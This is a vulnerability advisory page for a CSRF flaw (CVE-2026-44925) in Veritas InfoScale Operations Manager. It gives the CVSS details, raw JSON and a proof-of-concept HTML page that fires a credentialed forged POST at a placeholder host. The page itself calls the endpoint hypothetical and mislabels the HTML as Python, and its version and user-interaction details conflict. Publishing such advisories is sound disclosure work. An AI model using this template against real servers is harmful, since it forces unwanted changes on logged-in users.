Security Vulnerability Report
中文
CVE-2026-44925 CVSS 8.8 HIGH

CVE-2026-44925

Published: 2026-05-20 17:16:24
Last Modified: 2026-05-21 16:57:27

Description

Cross-Site Request Forgery (CSRF) vulnerability in InfoScale v.9.1.3 Operations Manager (VIOM) allows an attacker to force the user with an active session into clicking a malicious HTML link, which triggers unintended modifications on VIOM web application without the user's knowledge.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:veritas:infoscale_operations_manager:*:*:*:*:*:*:*:* - VULNERABLE
InfoScale Operations Manager (VIOM) v9.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-44925 --> <!-- Attacker hosts this HTML and sends the link to the victim --> <html> <body> <h1>CVE-2026-44925 CSRF PoC</h1> <p>Attempting to trigger configuration change...</p> <script> // The specific endpoint is hypothetical, based on the vulnerability type fetch('https://<victim-viom-host>/api/config/update', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'param1=malicious_value&param2=exploit', credentials: 'include' }).then(response => { console.log('CSRF request sent'); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44925", "sourceIdentifier": "[email protected]", "published": "2026-05-20T17:16:24.240", "lastModified": "2026-05-21T16:57:27.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in InfoScale v.9.1.3 Operations Manager (VIOM) allows an attacker to force the user with an active session into clicking a malicious HTML link, which triggers unintended modifications on VIOM web application without the user's knowledge."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:veritas:infoscale_operations_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.3", "matchCriteriaId": "6B9304E9-399B-40DD-B806-F8E540AE1A72"}]}]}], "references": [{"url": "https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}